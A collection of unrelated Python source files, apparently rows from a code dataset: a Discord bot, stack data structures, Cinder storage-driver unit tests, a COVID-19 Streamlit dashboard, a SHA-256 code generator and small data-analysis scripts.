    video = cv2.VideoWriter(join(VID_DIR, name+'.avi'), cv2.cv.CV_FOURCC('M', 'P', '4', '2'), 1.0, (width, height))
    for img in images:
        video.write(cv2.imread(join(aux_dir, img)))
    cv2.destroyAllWindows()
    video.release()
def natural_sort(images_list):
    """Sort names so embedded digit runs compare numerically.

    'Img2.png' sorts before 'Img10.png', which plain lexicographic
    ordering would reverse.
    """
    def _key(name):
        # Split into digit / non-digit chunks; digits compare as ints,
        # everything else case-insensitively.
        return [int(chunk) if chunk.isdigit() else chunk.lower()
                for chunk in re.split('([0-9]+)', name)]
    return sorted(images_list, key=_key)
def make_dir(dirName):
    """Create directory *dirName*, silently ignoring the OSError raised
    when it already exists (or cannot be created)."""
    try:
        mkdir(dirName)
    except OSError:
        pass
def main(parser, args):
    """Dispatch to the requested command (marking / segmentation /
    analysis) and optionally build an output video afterwards."""
    global VIDEO, TRAIN_IMG
    # Command-line overrides for the default video / training frame.
    if args.video:
        VIDEO = args.video
    if args.trainImg:
        TRAIN_IMG = args.trainImg
    # Mark lots of images
    if args.mark:
        marking()
    elif args.segm:
        # Segmentation mode: analysis with the segmented window shown.
        print "Training q-NN classifier..."
        mark_train(args)
        print "Starting video analysis..."
        clf = training()
        analysis(clf, args, segm=True)
    elif args.analy:
        print "Training q-NN classifier..."
        mark_train(args)
        print "Starting video analysis..."
        clf = training()
        analysis(clf, args)
    if args.genVideo:
        gen_video(args.output, args.genVideo)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog='robotica.py')
    parser.add_argument('-v', '--video',
                        help='Select a different video.')
    parser.add_argument('-t', '--trainImg',
                        help='Select a different trainingImg.')
    parser.add_argument('-o', '--output',
                        default='video_output',
                        help='Choose the output video name.')
    group = parser.add_argument_group('Commands')
    group.add_argument('-m', '--mark',
                       action='store_true',
                       help='Start marking process.')
    group.add_argument('-s', '--segm',
                       action='store_true',
                       help='Start segmentation process.')
    # NOTE(review): default='True' is the *string* 'True', not the boolean,
    # so args.analy is always truthy and analysis runs whenever -m/-s are
    # absent -- presumably intended as the default command; confirm.
    group.add_argument('-a', '--analy',
                       action='store_true', default='True',
                       help='Start analysis process.')
    group.add_argument('-g', '--genVideo',
                       choices=['segm', 'norm', 'analy', 'chull'],
                       nargs='?', const='analy',
                       help='Generate choosen procedure video.')
    args = parser.parse_args()
    main(parser, args)
|
991,201 | 04a25df867c84ddb273fc692faafa5c834a83c5c | # Main Workflow
import discord
from discord import message
from discord import file
from discord.ext import commands
import os
from dotenv import load_dotenv
from datetime import datetime
from github import Github
import git
import pytz
# Custom classes
from helpers.emojis import Emojis
# Load/run necessary components/functions
load_dotenv()
# Getting latest GitHub commit
g = Github(os.getenv("GITHUB_TOKEN"))
repo = g.get_repo("Mordai/PPKE-ITK-MI-2021-DCBot")
commits = repo.get_commits()
github_last_commit = commits[0]
# Commit message convention: title and description separated by a blank line.
github_messages = github_last_commit.commit.message.split('\n\n')
github_desc = "".join(github_messages[1:]) if len(github_messages[1:]) > 0 else "No desc given"
# Getting latest local git commit
try:
    local_repo = git.Repo(search_parent_directories=True)
    headcommit = local_repo.head.commit
    sha = local_repo.head.object.hexsha
    local_commiter = headcommit.committer.name
except Exception:
    # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
    # still propagate; outside a git checkout we fall back to empty values.
    sha = ""
    local_commiter = ""
# General variables
tz = pytz.timezone('Europe/Budapest')
now = datetime.now(tz)
MAIN_SERVER_GUILD = os.getenv("ITK_SERVER_ID")
TOKEN = os.getenv("DC_TOKEN")
intents = discord.Intents.all()
intents.members = True
########## BOT content ##########
bot = commands.Bot(intents = intents)
# Default/main events
@bot.event
async def on_ready():
    """Announce startup in the bot-log channel, including the current
    commit (local checkout or Heroku slug)."""
    print("Ready to go!")
    bot.CH_bot_log = bot.get_channel(891715602442510386)
    message_log_start = f"{Emojis.StatusEmojis.sparkle} `Bot started: " + now.strftime("%Y-%m-%d %H:%M:%S") + "`"
    try:
        message_local = "\n```Current HEAD → " + sha + \
            "\nCurrent author → " + local_commiter + "```"
    except Exception:  # narrowed from bare except:
        message_local = ""
    try:
        # HEROKU_SLUG_COMMIT is unset outside Heroku, so the string
        # concatenation raises TypeError and we fall back to "".
        message_heroku = "\n```Current HEAD → " + os.getenv("HEROKU_SLUG_COMMIT") + \
            "\nCurrent author → HEROKU (deployment)" + \
            "\nCommit name: " + github_messages[0] + \
            "\nCommit desc: " + github_desc + "```"
    except Exception:  # narrowed from bare except:
        message_heroku = ""
    #await bot.CH_bot_log.send(message_log_start + message_local if os.getenv("HEROKU_DEPLOYMENT") == "NO" else message_log_start + message_heroku)
@bot.event
async def on_member_join(member):
    """Give every newcomer the default member role."""
    # Hard-coded role id -- presumably the main guild's member role; confirm.
    role = member.guild.get_role(892034791321518151)
    print(role.name)
    await member.add_roles(role)
# Load extensions and run the BOT
for filename in os.listdir('./cogs'):
    if filename.endswith('.py'):
        bot.load_extension(f'cogs.{filename[:-3]}')
        # Log which cog was just loaded.  The original literal printed the
        # constant placeholder 'f(unknown) added' -- a mangled f-string.
        print(f'{filename[:-3]} added')
bot.run(TOKEN)
991,202 | fec1f43bf1eee599d2a701b644be8a2e226de7d3 | from .names import (
list_pvs, list_devices, list_elements, device_to_element, element_to_device
)
|
# Replace every element with the greatest element to its right; the last
# element has no right neighbour and becomes -1 (LeetCode 1299 style).
arr = [17, 18, 5, 4, 6, 1]
arr1 = []
# Walk right-to-left keeping the maximum seen so far: O(n) instead of the
# original O(n^2) max(arr[i+1:]) per position.  Output is identical.
running_max = -1
for value in reversed(arr):
    arr1.append(running_max)
    if value > running_max:
        running_max = value
arr1.reverse()
print(arr1)
|
def create_user(email, password, f_name, l_name):
    """Check if email exists, hash the password, create the user object
    and save it to the db.

    TODO: not implemented yet -- stub for the user-service layer.
    """
    pass
def delete_user(id):
    """Grab the user with this id from the db and delete it.

    TODO: not implemented yet.
    NOTE(review): the parameter name shadows the builtin id(); renaming
    would change the keyword API for existing callers.
    """
    pass
def update_user(id):
    """Grab the user from the db, update its fields and commit the
    changes.

    TODO: not implemented yet.
    """
    pass
def get_user(id):
    """Fetch the user with this id from the db and return it to the
    controller.

    TODO: not implemented yet.
    """
    pass
991,205 | 47326511e43b178ba1bc2a56c4cc3c8fbd0e2c3d | '''Step 1: Data Definition - Need to be able to pop/push values into a stack; also recognize when can no longer push/pop
Step 2: Signature - (int->int) input values into stack and output values
Step 3: Test Cases - self.assertTrue(s1.is_empty())
self.assertFalse(s1.is_empty())
self.assertTrue(s1.is_full())
self.assertFalse(s1.is_full())
self.assertEqual(s1.pop(), 1)
self.assertFalse(s1.pop())
self.assertEqual(s1.peek(), 3)
self.assertEqual(s1.size(), 2)'''
#Step 5: Body -
class Node:
    """Singly linked list cell: a payload plus a link to the next cell."""

    def __init__(self, data=None, next_node=None):
        self.data = data            # stored value
        self.next_node = next_node  # following Node, or None at the end
class StackLinked:
    """Last-in first-out stack backed by a singly linked list of Nodes."""

    def __init__(self, capacity):
        """Create an empty stack able to hold *capacity* items."""
        self.capacity = capacity
        # Sentinel node: an empty stack is head -> Node(None, None).
        self.head = Node(None, None)
        self.num_items = 0

    def is_empty(self):
        """Return True when the stack holds no items."""
        return self.num_items == 0

    def is_full(self):
        """Return True when the stack has reached its capacity."""
        return self.num_items == self.capacity

    def push(self, item):
        """Place *item* on top of the stack; raises IndexError when full."""
        if self.is_full():
            raise IndexError('Stack is full.')
        self.num_items += 1
        temp = Node(item)
        temp.next_node = self.head
        self.head = temp

    def pop(self):
        """Remove and return the top item; raises IndexError when empty.

        Bug fix: the original did ``self = self.head.next_node``, which
        only rebound the local name -- the stack itself never shrank, so
        every pop returned the same element while num_items drifted.
        """
        if self.is_empty():
            raise IndexError('Cant pop from empty stack.')
        temp = self.head.data
        self.head = self.head.next_node
        self.num_items -= 1
        return temp

    def peek(self):
        """Return the top item without removing it.

        NOTE(review): on an empty stack this returns the sentinel's None
        instead of raising, unlike StackArray.peek -- confirm intent.
        """
        return self.head.data

    def size(self):
        """Return the number of items currently stored (not the capacity)."""
        return self.num_items
class StackArray:
    """Implements an efficient last-in first-out Abstract Data Type using a Python List"""

    def __init__(self, capacity):
        """Creates and empty stack with a capacity"""
        self.capacity = capacity       # maximum number of items
        self.head = [None] * capacity  # fixed-size backing store
        self.num_items = 0             # current element count

    def is_empty(self):
        """Returns true if the stack self is empty and false otherwise"""
        return self.num_items == 0

    def is_full(self):
        """Returns true if the stack self is full and false otherwise"""
        return self.num_items == self.capacity

    def push(self, item):
        """Place *item* on top; raises IndexError when full; returns self."""
        if self.is_full():
            raise IndexError('Stack is full.')
        self.head[self.num_items] = item
        self.num_items += 1
        return self

    def pop(self):
        """Remove and return the most recently pushed item (LIFO)."""
        if self.is_empty():
            raise IndexError("Nothing to remove from stack.")
        self.num_items -= 1
        item = self.head[self.num_items]
        self.head[self.num_items] = None  # drop the reference
        return item

    def peek(self):
        """Return the top item without altering the stack."""
        if self.is_empty():
            raise IndexError('Nothing to peek in the stack.')
        return self.head[self.num_items - 1]

    def size(self):
        """Returns the number of elements currently in the stack, not the capacity"""
        return self.num_items
#Step 6: Run |
class Vehicle():
    """Simple record of a vehicle registration and its driver's age."""

    def __init__(self, registration_no, drivers_age):
        self.registration_no = registration_no  # plate / registration id
        self.drivers_age = drivers_age          # driver's age

    def __repr__(self):
        """Debug-friendly representation, e.g. Vehicle('KA-01', 30)."""
        return "Vehicle({!r}, {!r})".format(self.registration_no, self.drivers_age)
|
991,207 | 8450d1648d573fd5c82576db34d6f8bf7d771cb3 | #!/usr/bin/python3
# Demo of the project's Events/recorder publish-subscribe API.
from events.Events import Events

events = Events()
recorder = events.recorder()


@recorder.subscribe
def a(parent, text):
    # Plain subscriber: echoes the payload it receives.
    print('a prints: '+text)


@recorder.subscribe('a', 1)
def b(parent, text):
    # NOTE(review): presumably subscribes to channel 'a' at priority 1 and
    # forwards a modified payload through *parent* — confirm against the
    # Events API, which is not visible here.
    parent('b prepends: '+text)


#events.subscribe(a, 0)
#events.subscribe(b, 0, 'a')

# First invoke fires the recorder-registered handlers; after
# unsubscribe_all() the second invoke should reach none of them.
events.invoke('a', 'hello')
recorder.unsubscribe_all()
events.invoke('a', 'hello')
|
def valor_maximo(lista):
    """Return the largest value in *lista* (0 for an empty list).

    Fix: the original initialised the running maximum to 0, so a list
    containing only negative numbers wrongly returned 0 instead of its
    actual maximum.  The empty-list behaviour (return 0) is preserved
    for backward compatibility.
    """
    if not lista:
        return 0  # preserve original empty-input behaviour
    return max(lista)
991,209 | 254c706d2459f9cde426e66b2178806b8e8c706b | #!/usr/bin/python3
"""This modules supports building CMake projects."""
_MAJOR = 0
_MINOR = 5
_PATCH = 0
_STRING = "{}.{}.{}".format(_MAJOR, _MINOR, _PATCH)
|
991,210 | b66c41a694e1ef83b1269b336e3f4b6df5ea4494 | from collections import deque
words = """
428a2f98 71374491 b5c0fbcf e9b5dba5 3956c25b 59f111f1 923f82a4 ab1c5ed5
d807aa98 12835b01 243185be 550c7dc3 72be5d74 80deb1fe 9bdc06a7 c19bf174
e49b69c1 efbe4786 0fc19dc6 240ca1cc 2de92c6f 4a7484aa 5cb0a9dc 76f988da
983e5152 a831c66d b00327c8 bf597fc7 c6e00bf3 d5a79147 06ca6351 14292967
27b70a85 2e1b2138 4d2c6dfc 53380d13 650a7354 766a0abb 81c2c92e 92722c85
a2bfe8a1 a81a664b c24b8b70 c76c51a3 d192e819 d6990624 f40e3585 106aa070
19a4c116 1e376c08 2748774c 34b0bcb5 391c0cb3 4ed8aa4a 5b9cca4f 682e6ff3
748f82ee 78a5636f 84c87814 8cc70208 90befffa a4506ceb bef9a3f7 c67178f2
"""
words = words.strip().replace("\n", " ").split(" ")
assert len(words) == 64
ops = deque("abcdefgh")
for x in range(0, 64):
if not x % 8:
print " // Round {}".format(x)
if x >= 16:
print " w{:02} = s1(w{:02}) + w{:02} + s0(w{:02}) + w{:02},".format(x & 0xf, (x - 2) & 0xf, (x - 7) & 0xf, (x - 15) & 0xf, (x - 16) & 0xf),
print " r({}, 0x{}, w{:02});".format(", ".join(ops), words[x], x & 0xf)
ops.rotate(1)
if not (x + 1) % 8:
print
|
991,211 | 5276fba23319f0450dc7e5ee2f892f075f7212e0 | # Copyright (c) 2017 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import unittest
import mock
from oslo_utils import units
from cinder import exception
from cinder.tests.unit.volume.drivers.dell_emc.unity import test_adapter
from cinder.volume.drivers.dell_emc.unity import utils
def get_volume_type_extra_specs(volume_type):
    """Stub for cinder.volume.volume_types.get_volume_type_extra_specs:
    report the given value as the provisioning type."""
    extra_specs = {'provisioning:type': volume_type}
    return extra_specs
def get_volume_type_qos_specs(type_id):
    """Stub for cinder.volume.volume_types.get_volume_type_qos_specs:
    return a canned qos_specs dict for the known type ids, None otherwise."""
    canned = {
        'invalid_backend_qos_consumer': {
            'qos_specs': {'consumer': 'invalid'}
        },
        'both_none': {
            'qos_specs': {'consumer': 'back-end', 'specs': {}}
        },
        'max_1000_iops': {
            'qos_specs': {
                'id': 'max_1000_iops',
                'consumer': 'both',
                'specs': {
                    'maxIOPS': 1000
                }
            }
        },
        'max_2_mbps': {
            'qos_specs': {
                'id': 'max_2_mbps',
                'consumer': 'back-end',
                'specs': {
                    'maxBWS': 2
                }
            }
        },
    }
    return canned.get(type_id)
def patch_volume_types(func):
    """Decorator: run *func* with the cinder volume-type lookups patched.

    For the duration of the call, cinder.volume.volume_types'
    get_volume_type_extra_specs and get_volume_type_qos_specs are replaced
    by the fake implementations defined earlier in this module.
    """
    @functools.wraps(func)
    @mock.patch(target=('cinder.volume.volume_types'
                        '.get_volume_type_extra_specs'),
                new=get_volume_type_extra_specs)
    @mock.patch(target=('cinder.volume.volume_types'
                        '.get_volume_type_qos_specs'),
                new=get_volume_type_qos_specs)
    def func_wrapper(*args, **kwargs):
        return func(*args, **kwargs)
    return func_wrapper
class UnityUtilsTest(unittest.TestCase):
    """Unit tests for cinder.volume.drivers.dell_emc.unity.utils.

    Fix: test_extract_fc_uids_not_found previously asserted against
    utils.extract_iscsi_uids (copy-paste slip) and therefore never covered
    the FC code path; it now targets utils.extract_fc_uids.
    """

    def test_validate_pool_names_filter(self):
        all_pools = list('acd')
        pool_names = utils.validate_pool_names(list('abc'), all_pools)
        self.assertIn('a', pool_names)
        self.assertIn('c', pool_names)
        self.assertNotIn('b', pool_names)
        self.assertNotIn('d', pool_names)

    def test_validate_pool_names_non_exists(self):
        def f():
            all_pools = list('abc')
            utils.validate_pool_names(list('efg'), all_pools)
        self.assertRaises(exception.VolumeBackendAPIException, f)

    def test_validate_pool_names_default(self):
        # Empty or None filter means "every existing pool is valid".
        all_pools = list('ab')
        pool_names = utils.validate_pool_names([], all_pools)
        self.assertEqual(2, len(pool_names))
        pool_names = utils.validate_pool_names(None, all_pools)
        self.assertEqual(2, len(pool_names))

    def test_build_provider_location(self):
        location = utils.build_provider_location('unity', 'thin', 'ev_1', '3')
        expected = 'id^ev_1|system^unity|type^thin|version^3'
        self.assertEqual(expected, location)

    def test_extract_provider_location_version(self):
        location = 'id^ev_1|system^unity|type^thin|version^3'
        self.assertEqual('3',
                         utils.extract_provider_location(location, 'version'))

    def test_extract_provider_location_type(self):
        location = 'id^ev_1|system^unity|type^thin|version^3'
        self.assertEqual('thin',
                         utils.extract_provider_location(location, 'type'))

    def test_extract_provider_location_system(self):
        location = 'id^ev_1|system^unity|type^thin|version^3'
        self.assertEqual('unity',
                         utils.extract_provider_location(location, 'system'))

    def test_extract_provider_location_id(self):
        location = 'id^ev_1|system^unity|type^thin|version^3'
        self.assertEqual('ev_1',
                         utils.extract_provider_location(location, 'id'))

    def test_extract_provider_location_not_found(self):
        location = 'id^ev_1|system^unity|type^thin|version^3'
        self.assertIsNone(utils.extract_provider_location(location, 'na'))

    def test_extract_provider_location_none(self):
        self.assertIsNone(utils.extract_provider_location(None, 'abc'))

    def test_extract_iscsi_uids(self):
        connector = {'host': 'fake_host',
                     'initiator': 'fake_iqn'}
        self.assertEqual(['fake_iqn'],
                         utils.extract_iscsi_uids(connector))

    def test_extract_iscsi_uids_not_found(self):
        connector = {'host': 'fake_host'}
        self.assertRaises(exception.VolumeBackendAPIException,
                          utils.extract_iscsi_uids,
                          connector)

    def test_extract_fc_uids(self):
        connector = {'host': 'fake_host',
                     'wwnns': ['1111111111111111',
                               '2222222222222222'],
                     'wwpns': ['3333333333333333',
                               '4444444444444444']
                     }
        self.assertEqual(['11:11:11:11:11:11:11:11:33:33:33:33:33:33:33:33',
                          '22:22:22:22:22:22:22:22:44:44:44:44:44:44:44:44', ],
                         utils.extract_fc_uids(connector))

    def test_extract_fc_uids_not_found(self):
        connector = {'host': 'fake_host'}
        # Fixed: was utils.extract_iscsi_uids, which left the FC branch untested.
        self.assertRaises(exception.VolumeBackendAPIException,
                          utils.extract_fc_uids,
                          connector)

    def test_byte_to_gib(self):
        self.assertEqual(5, utils.byte_to_gib(5 * units.Gi))

    def test_byte_to_mib(self):
        self.assertEqual(5, utils.byte_to_mib(5 * units.Mi))

    def test_gib_to_mib(self):
        self.assertEqual(5 * units.Gi / units.Mi, utils.gib_to_mib(5))

    def test_convert_ip_to_portal(self):
        self.assertEqual('1.2.3.4:3260', utils.convert_ip_to_portal('1.2.3.4'))

    def test_convert_to_itor_tgt_map(self):
        zone_mapping = {
            'san_1': {
                'initiator_port_wwn_list':
                    ('200000051e55a100', '200000051e55a121'),
                'target_port_wwn_list':
                    ('100000051e55a100', '100000051e55a121')
            }
        }
        ret = utils.convert_to_itor_tgt_map(zone_mapping)
        self.assertEqual(['100000051e55a100', '100000051e55a121'], ret[0])
        mapping = ret[1]
        targets = ('100000051e55a100', '100000051e55a121')
        self.assertEqual(targets, mapping['200000051e55a100'])
        self.assertEqual(targets, mapping['200000051e55a121'])

    def test_get_pool_name(self):
        volume = test_adapter.MockOSResource(host='host@backend#pool_name')
        self.assertEqual('pool_name', utils.get_pool_name(volume))

    def test_ignore_exception(self):
        class IgnoredException(Exception):
            pass

        def f():
            raise IgnoredException('any exception')

        try:
            utils.ignore_exception(f)
        except IgnoredException:
            self.fail('should not raise any exception.')

    def test_assure_cleanup(self):
        data = [0]

        def _enter():
            data[0] += 10
            return data[0]

        def _exit(x):
            data[0] = x - 1

        ctx = utils.assure_cleanup(_enter, _exit, True)
        with ctx as r:
            self.assertEqual(10, r)
        self.assertEqual(9, data[0])

    def test_get_backend_qos_specs_type_none(self):
        volume = test_adapter.MockOSResource(volume_type_id=None)
        ret = utils.get_backend_qos_specs(volume)
        self.assertIsNone(ret)

    @patch_volume_types
    def test_get_backend_qos_specs_none(self):
        volume = test_adapter.MockOSResource(volume_type_id='no_qos')
        ret = utils.get_backend_qos_specs(volume)
        self.assertIsNone(ret)

    @patch_volume_types
    def test_get_backend_qos_invalid_consumer(self):
        volume = test_adapter.MockOSResource(
            volume_type_id='invalid_backend_qos_consumer')
        ret = utils.get_backend_qos_specs(volume)
        self.assertIsNone(ret)

    @patch_volume_types
    def test_get_backend_qos_both_none(self):
        volume = test_adapter.MockOSResource(volume_type_id='both_none')
        ret = utils.get_backend_qos_specs(volume)
        self.assertIsNone(ret)

    @patch_volume_types
    def test_get_backend_qos_iops(self):
        volume = test_adapter.MockOSResource(volume_type_id='max_1000_iops')
        ret = utils.get_backend_qos_specs(volume)
        expected = {'maxBWS': None, 'id': 'max_1000_iops', 'maxIOPS': 1000}
        self.assertEqual(expected, ret)

    @patch_volume_types
    def test_get_backend_qos_mbps(self):
        volume = test_adapter.MockOSResource(volume_type_id='max_2_mbps')
        ret = utils.get_backend_qos_specs(volume)
        expected = {'maxBWS': 2, 'id': 'max_2_mbps', 'maxIOPS': None}
        self.assertEqual(expected, ret)
|
991,212 | d20bf077dc0ee794344bac80c8c3d3dceae762d7 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Packaging script for the opps-social Django/Opps app."""
from setuptools import setup, find_packages

from opps import social

install_requires = ["opps"]

classifiers = ["Development Status :: 4 - Beta",
               "Intended Audience :: Developers",
               "License :: OSI Approved :: MIT License",
               "Operating System :: OS Independent",
               "Framework :: Django",
               'Programming Language :: Python',
               "Programming Language :: Python :: 2.7",
               "Operating System :: OS Independent",
               "Topic :: Internet :: WWW/HTTP :: Dynamic Content",
               'Topic :: Software Development :: Libraries :: Python Modules']

# Prefer the README as the long description; fall back to the package's own
# short description when the file is missing or unreadable.
try:
    long_description = open('README.rst').read()
except IOError:  # was a bare except: don't swallow SystemExit/KeyboardInterrupt
    long_description = social.__description__

setup(
    name='opps-social',
    namespace_packages=['opps', 'opps.social'],
    version=social.__version__,
    description=social.__description__,
    long_description=long_description,
    classifiers=classifiers,
    keywords='social opps cms django apps magazines websites',
    author=social.__author__,
    author_email=social.__email__,
    url='http://oppsproject.org',
    download_url="https://github.com/opps/opps-social/tarball/master",
    license=social.__license__,
    packages=find_packages(exclude=('doc', 'docs',)),
    package_dir={'opps': 'opps'},
    install_requires=install_requires,
)
991,213 | 96be9778f735b25acb9bd1b0afff60d7d7d02e06 | import pandas as pd
import matplotlib.pyplot as plt
# Plot the non-decreasing envelope of the first row of DistanceRandom.csv.
df = pd.read_csv('DistanceRandom.csv', sep=',', header=None)
print(df)

# Keep only values that do not fall below the running maximum; start both
# series with a 0 sentinel as in the original.
data = [0]
y = [0]
for column in list(df):
    value = float(df[column][0])
    if value >= data[-1]:
        data.append(value)
        y.append(column)

plt.plot(y, data)
plt.show()
991,214 | 9e86a1b54c42d5c8f212a138117f234b9d97a405 | import numpy as np
# Demo of numpy.insert on a 3x2 array (translated comments; the ## lines
# preserve the outputs the author recorded).
a=np.array([[1,2],[3,4],[5,6]])
print('array is',a)
##array is [[1 2]
## [3 4]
## [5 6]]
#print('Axis argument not passed: the input array is flattened before insertion.' ,np.insert(a,3,[11,12]))
#flattened before insertion: [ 1 2 3 11 12 4 5 6]
##print('Broadcast along axis 0:' )
##print(np.insert(a,1,[11],axis = 0) )
##Broadcast along axis 0:
##[[ 1 2]
## [11 11]
## [ 3 4]
## [ 5 6]]
##print('Broadcast along axis 1:' )
##print(np.insert(a,1,11,axis = 1))
##array is [[1 2]
## [3 4]
## [5 6]]
##Broadcast along axis 1:
##[[ 1 11 2]
## [ 3 11 4]
## [ 5 11 6]]
991,215 | e140574b193736bdadb9f71efcdcfb33a6c60ae8 | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 29 16:32:41 2020
@author: Yuki-F
"""
from ._fir1 import fir1
from ._fir2 import fir2
from ._firls import firls
from ._firpm import firpm
from ._kaiserord import kaiserord
from ._sgolay import sgolay |
991,216 | d4cc45c5b58fb2ba405793cc37d59a79e9b6eb03 | from urllib.request import urlopen as request
import requests
import json
import streamlit as st
from pandas.io.json import json_normalize
import matplotlib.pyplot as plt; plt.rcdefaults()
import numpy as np
import pandas as pd
def autolabel(rects):
    """Write each bar's integer height, centred just above the bar."""
    for bar in rects:
        h = int(bar.get_height())
        x_mid = bar.get_x() + bar.get_width() / 2.
        plt.text(x_mid, h, '%d' % h, ha='center', va='bottom')
def getdata():
    """Fetch per-location COVID-19 stats from the tracker API and return a
    DataFrame sorted by confirmed cases (descending).

    Columns kept after cleanup: Province, Country, Confirmed Cases, Deaths.
    NOTE(review): performs a network request on every call — no caching.
    """
    # get the data
    url='https://coronavirus-tracker-api.herokuapp.com/v2/locations'
    data=request(url)
    # convert data from bytes to json
    final_data=json.loads(data.read())
    final_data=final_data['locations']
    # sort the data, using number of confirmed cases as the key (descending)
    sorted_data=sorted(final_data,key=lambda k: k['latest']['confirmed'],reverse=True)
    # flatten the nested json into a dataframe, drop unused columns and
    # rename the rest to display-friendly names
    df=json_normalize(sorted_data)
    df=df.drop(['coordinates.longitude','coordinates.latitude','last_updated','latest.recovered','id','country_code'],axis=1)
    df.rename(columns = {'province':'Province','latest.deaths':'Deaths','latest.confirmed':'Confirmed Cases','country':'Country'}, inplace = True)
    return df
def worldwides():
    """Render the worldwide COVID-19 dashboard in Streamlit.

    Shows the global confirmed/death totals, a bar chart of both values,
    a per-country table selected via a select box, and the full table.
    """
    ogstatsurl='https://coronavirus-tracker-api.herokuapp.com/v2/latest'
    # making get request to the API
    client=request(ogstatsurl)
    data=client.read()
    client.close()
    # bytes to json
    final=json.loads(data)
    # number of confirmed cases all around the world ---------variable name - confnum
    confnum=final['latest']['confirmed']
    confirmed='''## Confirmed Cases ``` %d``` '''%(confnum)
    st.markdown(confirmed)
    # number of deaths around the world ---------variable name -deathnum
    deathnum=final['latest']['deaths']
    deaths='''## Deaths ``` %d ``` '''%(deathnum)
    st.markdown(deaths)
    objects = ('Deaths', 'Total Cases')  # labels for the bar chart
    y_pos = np.arange(len(objects))
    #active=int(confnum)-(int(recoverednum)+int(deathnum))#finding number of active cases
    values = [int(deathnum),int(confnum)]  # values for the bar chart
    ax=plt.bar(y_pos, values, align='center', alpha=0.7)  # bar chart plotted using matplotlib
    plt.xticks(y_pos, objects)
    # Additional data for the graph
    plt.title('COVID-19')
    autolabel(ax)
    st.write(mpl_fig=ax)
    st.pyplot()
    st.set_option('deprecation.showPyplotGlobalUse', False)
    df=getdata()
    # getting the list of countries (unique, alphabetically sorted)
    country_list=df['Country'].tolist()
    country_list=sorted(list(set(country_list)))
    choice=st.selectbox('Choose Country',country_list)
    # finding data related to specific country and displaying
    value=df.loc[df['Country']==choice]
    st.table(value)
    # displaying all data
    st.table(df)
    return
|
991,217 | 47d019ed6bdad323438abb8a00ede24912e2b2f4 | # coding=utf-8
from django.contrib.auth.forms import UserCreationForm
from django import forms
from .models import Usuario
class UserAdminCreationForm(UserCreationForm):
    """Admin "add user" form for the custom Usuario model.

    Extends Django's UserCreationForm (which supplies the password fields)
    and exposes only username and e-mail.
    """
    class Meta:
        model = Usuario
        fields = ['username', 'email']
class UserAdminForm(forms.ModelForm):
    """Admin "change user" form exposing the editable Usuario fields."""
    class Meta:
        model = Usuario
        fields = ['username', 'email', 'nome', 'is_active', 'is_staff']
991,218 | 24bf83883a869c1f05c756ddd9142c37cf876d28 | #!/usr/bin/env python3
import os
from _decimal import Decimal
import time
from supplychainpy import simulate
from supplychainpy import model_inventory
__author__ = 'kevin'
def main():
    """Run a timed end-to-end supplychainpy inventory analysis demo.

    Loads order history from data.csv, performs an ABC/XYZ analysis, runs a
    single Monte Carlo simulation over a 12-period window, optimises for a
    95% service level, prints each optimised order summary and finally the
    elapsed wall-clock time in seconds.
    """
    start_time = time.time()
    orders_analysis = model_inventory.analyse_orders_abcxyz_from_file(file_path="data.csv", z_value=Decimal(1.28),
                                                                      reorder_cost=Decimal(5000), file_type="csv")
    sim = simulate.run_monte_carlo(orders_analysis=orders_analysis.orders, runs=1, period_length=12)
    sim_window = simulate.summarize_window(simulation_frame=sim, period_length=12)
    sim_frame = simulate.summarise_frame(sim_window)
    optimised = simulate.optimise_service_level(service_level=95.0, frame_summary=sim_frame,
                                                orders_analysis=orders_analysis.orders, runs=1,
                                                percentage_increase=1.30)
    for s in optimised:
        print(s.orders_summary())
    end_time = time.time()
    elapsed = end_time - start_time
    print(elapsed)


if __name__ == '__main__':
    main()
|
991,219 | 8db33282cfed02ed627d1a527f28acf57a3a0734 | import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
# Conditional-CDF analysis of pay-offs for one game (code 5902).
# Refactor: the original repeated the same plotting block eight times,
# differing only in the betamount cutoff and the target axes; a single
# loop produces identical figures.

# Load the raw pay-off table and keep only game code 5902.
df = pd.read_csv('BetPayOff_WithCode.csv')
data = df.drop(['rawdatatype', 'gametype', 'website'], axis=1)
requiredata = data[data.loc[:, "code"] == 5902]

# CJK-capable font for the Chinese text in the titles.
font = FontProperties(fname=r"c:\windows\fonts\simsun.ttc", size=14)

rawdata = requiredata.sort_values(by=['betamount']).dropna()
Total = rawdata['ct'].sum()
Average = (rawdata['betamount'] * rawdata['ct']).sum() / Total
Max = rawdata['betamount'].max()
Min = rawdata['betamount'].min()
rawdata.loc[:, 'ctratio'] = rawdata.loc[:, 'ct'] / Total
rawdata.loc[:, 'cumsum_ct'] = rawdata.loc[:, 'ctratio'].cumsum(axis=0)

# Quantiles of the cumulative bet-count distribution; each quantile maps to
# the smallest betamount whose cumulative share reaches it.
partition = [0.5, 0.6, 0.7, 0.87, 0.94, 0.95, 0.98, 1]
print(partition)
sep = [rawdata[rawdata['cumsum_ct'] >= q]['betamount'].iloc[0] for q in partition]
print('Betamount切割點{}'.format(sep))

# One conditional-CDF scatter plot per betamount cutoff, on a 2 x 4 grid.
fig, axes = plt.subplots(nrows=2, ncols=4)
plt.suptitle('Distribution of payoff conditioned on betamount of {}, where betamount has max = {}, min = {}, aver = {}'.format('BBIN糖果派對', Max, Min, Average), fontproperties=font)
for i, cutoff in enumerate(sep):
    ax = axes[i // 4, i % 4]
    subset = rawdata[rawdata['betamount'] <= cutoff].sort_values(by=['payoff'])
    denom = subset['ct'].sum()
    # Conditional CDF of payoff given betamount <= cutoff.
    subset['con_cdf'] = subset['ct'].cumsum(axis=0) / denom
    subset.plot(x='payoff', y='con_cdf', kind='scatter', ax=ax)
    ax.set_xlabel('payoff')
    ax.set_ylabel('probability')
    ax.set_title('P(payoff|betamount<{})'.format(cutoff), fontproperties=font)
plt.show()
